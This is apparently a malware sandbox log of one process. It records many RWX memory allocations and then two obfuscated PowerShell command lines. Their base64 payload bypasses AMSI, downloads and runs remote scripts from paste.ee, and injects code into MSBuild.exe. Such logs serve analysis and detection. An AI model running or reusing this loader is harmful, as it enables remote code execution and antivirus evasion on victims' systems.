stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01eca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc92000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ec2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ed2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0203a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ed3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ed4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0208b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02087000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ecb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02085000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ed5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0203c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ed6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0208c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aeb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
cmdline powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received W`1¯§]í½Ü€vC›"hؼe¯U6ÍDOWNGRD ~R°_!—HkÍì¼¾ ¬»|ì€jtsç}‚ ‡–Æ~ðÀ ÿ 
Data received ›
